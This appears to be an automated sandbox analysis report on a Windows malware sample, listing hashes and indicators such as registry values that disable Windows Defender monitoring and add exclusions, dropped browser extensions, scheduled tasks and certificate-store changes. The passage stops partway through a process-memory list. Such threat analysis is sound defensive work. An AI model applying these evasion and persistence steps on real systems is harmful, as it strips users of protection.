Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
19/10/2022, 13:11
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
cb0f9489fbc24ff67282a69b6755afc1
-
SHA1
6aed188a3317a00f57b54305eacad92f3696e0c7
-
SHA256
ba22111769947aa2cd2e8b127d47999b03a4e695486a5df899230168f1182ca5
-
SHA512
9f79891467a8145d00f43fba0b3455b1442ce9973185bd21b30e833e6e2dae4bc0e596636e1d51739f1f5057553d0c4272fdf2adfe47768d15d31354dbc5d9c4
-
SSDEEP
196608:91OVjkSDnKemniDFmxfeS82jbU+ttCsrLQY1vfNDjqRfbMbUX:3OR5nKH8FmxWS8yblttfRBNObLX
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\etvgnoeTU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UscLlFnOqqRpC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\etvgnoeTU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\gNyejqXGwyEfnHVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dgYCiexoFJqU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UxWHbdhjlhUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dgYCiexoFJqU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\gNyejqXGwyEfnHVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UscLlFnOqqRpC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UxWHbdhjlhUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Executes dropped EXE 4 IoCs
pid Process 1260 Install.exe 1972 Install.exe 1960 WMCjrFl.exe 1756 zxjZkXd.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 832 file.exe 1260 Install.exe 1260 Install.exe 1260 Install.exe 1260 Install.exe 1972 Install.exe 1972 Install.exe 1972 Install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json zxjZkXd.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json zxjZkXd.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 zxjZkXd.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WMCjrFl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 zxjZkXd.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol WMCjrFl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 zxjZkXd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol zxjZkXd.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini WMCjrFl.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 zxjZkXd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 zxjZkXd.exe -
Drops file in Program Files directory 10 IoCs
description ioc Process File created C:\Program Files (x86)\etvgnoeTU\AnhvEZe.xml zxjZkXd.exe File created C:\Program Files (x86)\dgYCiexoFJqU2\DCLIRqz.xml zxjZkXd.exe File created C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR\CdAKodZ.xml zxjZkXd.exe File created C:\Program Files (x86)\etvgnoeTU\QMdqYz.dll zxjZkXd.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak zxjZkXd.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja zxjZkXd.exe File created C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR\iICHTDi.dll zxjZkXd.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi zxjZkXd.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi zxjZkXd.exe File created C:\Program Files (x86)\dgYCiexoFJqU2\VQoMKdZqtYmzR.dll zxjZkXd.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bxLHRKpEAJQThoYlam.job schtasks.exe File created C:\Windows\Tasks\ebHKJInuomVbGemVL.job schtasks.exe File created C:\Windows\Tasks\ovXByvBxoEsnrcO.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1916 schtasks.exe 1724 schtasks.exe 2008 schtasks.exe 452 schtasks.exe 856 schtasks.exe 1868 schtasks.exe 1952 schtasks.exe 1580 schtasks.exe 1200 schtasks.exe 984 schtasks.exe 1948 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs zxjZkXd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-7f-bb-40-27-55\WpadDecisionReason = "1" zxjZkXd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections zxjZkXd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs zxjZkXd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B790B50F-80DD-4A0B-9E6D-E7334F54EFED}\42-7f-bb-40-27-55 zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root zxjZkXd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0019000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" zxjZkXd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B790B50F-80DD-4A0B-9E6D-E7334F54EFED}\WpadDecisionTime = 70d9fbadbce3d801 zxjZkXd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B790B50F-80DD-4A0B-9E6D-E7334F54EFED}\WpadDecision = "0" zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings zxjZkXd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B790B50F-80DD-4A0B-9E6D-E7334F54EFED}\WpadDecisionReason = "1" zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates zxjZkXd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates zxjZkXd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B790B50F-80DD-4A0B-9E6D-E7334F54EFED} zxjZkXd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B790B50F-80DD-4A0B-9E6D-E7334F54EFED}\WpadNetworkName = "Network 2" zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zxjZkXd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed zxjZkXd.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 zxjZkXd.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde zxjZkXd.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 2008 powershell.EXE 2008 powershell.EXE 2008 powershell.EXE 1952 powershell.EXE 1952 powershell.EXE 1952 powershell.EXE 1016 powershell.EXE 1016 powershell.EXE 1016 powershell.EXE 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe 1756 zxjZkXd.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2008 powershell.EXE Token: SeDebugPrivilege 1952 powershell.EXE Token: SeDebugPrivilege 1016 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 832 wrote to memory of 1260 832 file.exe 28 PID 832 wrote to memory of 1260 832 file.exe 28 PID 832 wrote to memory of 1260 832 file.exe 28 PID 832 wrote to memory of 1260 832 file.exe 28 PID 832 wrote to memory of 1260 832 file.exe 28 PID 832 wrote to memory of 1260 832 file.exe 28 PID 832 wrote to memory of 1260 832 file.exe 28 PID 1260 wrote to memory of 1972 1260 Install.exe 29 PID 1260 wrote to memory of 1972 1260 Install.exe 29 PID 1260 wrote to memory of 1972 1260 Install.exe 29 PID 1260 wrote to memory of 1972 1260 Install.exe 29 PID 1260 wrote to memory of 1972 1260 Install.exe 29 PID 1260 wrote to memory of 1972 1260 Install.exe 29 PID 1260 wrote to memory of 1972 1260 Install.exe 29 PID 1972 wrote to memory of 1800 1972 Install.exe 31 PID 1972 wrote to memory of 1800 1972 Install.exe 31 PID 1972 wrote to memory of 1800 1972 Install.exe 31 PID 1972 wrote to memory of 1800 1972 Install.exe 31 PID 1972 wrote to memory of 1800 1972 Install.exe 31 PID 1972 wrote to memory of 1800 1972 Install.exe 31 PID 1972 wrote to memory of 1800 1972 Install.exe 31 PID 1972 wrote to memory of 1692 1972 Install.exe 33 PID 1972 wrote to memory of 1692 1972 Install.exe 33 PID 1972 wrote to memory of 1692 1972 Install.exe 33 PID 1972 wrote to memory of 1692 1972 Install.exe 33 PID 1972 wrote to memory of 1692 1972 Install.exe 33 PID 1972 wrote to memory of 1692 1972 Install.exe 33 PID 1972 wrote to memory of 1692 1972 Install.exe 33 PID 1800 wrote to memory of 920 1800 forfiles.exe 34 PID 1800 wrote to memory of 920 1800 forfiles.exe 34 PID 1800 wrote to memory of 920 1800 forfiles.exe 34 PID 1800 wrote to memory of 920 1800 forfiles.exe 34 PID 1800 wrote to memory of 920 1800 forfiles.exe 34 PID 1800 wrote to memory of 920 1800 forfiles.exe 34 PID 1800 wrote to memory of 920 1800 forfiles.exe 34 PID 1692 wrote to memory of 1508 1692 forfiles.exe 36 PID 1692 wrote to memory of 1508 1692 forfiles.exe 36 PID 1692 wrote to memory of 1508 1692 forfiles.exe 36 PID 1692 wrote to memory of 1508 1692 forfiles.exe 36 PID 1692 wrote to memory of 1508 1692 forfiles.exe 36 PID 1692 wrote to memory of 1508 1692 forfiles.exe 36 PID 1692 wrote to memory of 1508 1692 forfiles.exe 36 PID 920 wrote to memory of 796 920 cmd.exe 37 PID 920 wrote to memory of 796 920 cmd.exe 37 PID 920 wrote to memory of 796 920 cmd.exe 37 PID 920 wrote to memory of 796 920 cmd.exe 37 PID 920 wrote to memory of 796 920 cmd.exe 37 PID 920 wrote to memory of 796 920 cmd.exe 37 PID 920 wrote to memory of 796 920 cmd.exe 37 PID 1508 wrote to memory of 1576 1508 cmd.exe 38 PID 1508 wrote to memory of 1576 1508 cmd.exe 38 PID 1508 wrote to memory of 1576 1508 cmd.exe 38 PID 1508 wrote to memory of 1576 1508 